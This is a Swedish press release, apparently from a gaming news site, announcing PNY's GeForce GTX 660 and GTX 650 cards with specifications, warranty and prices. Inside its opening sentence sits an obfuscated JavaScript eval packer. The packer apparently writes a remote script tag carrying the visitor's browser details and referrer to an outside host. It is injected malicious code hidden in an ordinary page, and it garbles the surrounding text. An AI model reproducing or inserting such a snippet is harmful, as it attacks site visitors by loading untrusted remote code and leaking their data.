Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

PC

De senaste PNY GeForce GTX 660 och 650

De senaste PNY GeForce GTX 660 och 650
Sebastian Plengier Ehrnfelt

De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|neaty|var|u0026u|referrer|dhefi||js|php’.split(‘|’),0,{}))
två korten, som är de senaste produkterna från NVIDIA och är baserade på dess Kepler-arkitektur, erbjuder prestanda till ett pris som passar alla plånböcker. Alla typer av spelentusiaster kan spela sina favoritspel och ta del av de nya NVIDIA teknologierna GPU Boost, Adaptive Vertical Sync och NVIDIA 3D Surround.

Pauline Monin, PNY Europe PC Components Products Manager, säger: “Med GeForce GTX 660 och GTX 650 blir det möjligt för alla att spela i full HD. Med dessa nya GPU:s kan både casual gamers och spelentusiaster spela de senaste spelen.”

GeForce® GTX 660: det självklara valet!

Det nya valet för alla spelintresserade, GeForce GTX 660 från PNY, erbjuder prestanda och hastighet för de senaste dataspelen. Kortet ersätter GTX 560 GPU och har samma egenskaper som de äldre produkterna i utbudet, GTX 660Ti och GTX 670, och är en ideal kombination av prestanda och pris. PNY GeForce GTX 660 är utrustat med 960 CUDA processorer och 2GB av GDDR5 192 bitar minne och lämnar inga tvivel gällande dess styrka. Kortet inkluderar alla de senaste teknologierna, både Microsoft DirectX 11 och NVIDIA GPU Boost, Adaptive Vertical Sync, 3D Vision Surround och PhysX och SLI.

Pris och tillgänglighet

PNY GeForce GTX 660 kommer med ett 3 års garanti och finns nu tillgängligt att köpa från PNYs vanliga återförsäljare och internetleverantörer i Sverige till ett pris av 1.995 SEK.

GeForce® GTX 650: styrka till ett fantastiskt pris!

Med sin kompakta design och höga prestanda är PNY GeForce GTX 650 det självklara valet i höst för spelentusiaster som söker hög prestanda. Med samma funktioner som mer avancerade grafikkort erbjuder GeForce GTX 650 prestanda till ett bra pris. Kortet har 380 CUDA processorer på 1058 MHz och 1 GB GDDR5 128 bitar gränssnitt. Det kan anslutas via PCI Express 3.0, 2-Port DVI-port och en Mini-HDMI-port. Kortet stöds dessutom av Microsoft DirectX 11 teknologi och NVIDIA Adaptive Vertical Sync, 3D Vision Surround och PhysX. Slutligen, GeForce GTX 650 drar inte stora mängder el (TDP 65 watt).

Pris och tillgänglighet

PNY GeForce GTX 650 kommer med ett 3 års garanti och finns nu tillgängligt att köpa från PNYs vanliga återförsäljare och internetleverantörer i Sverige till ett pris av 1.595 SEK.

Detta är ett pressmeddelande från PNY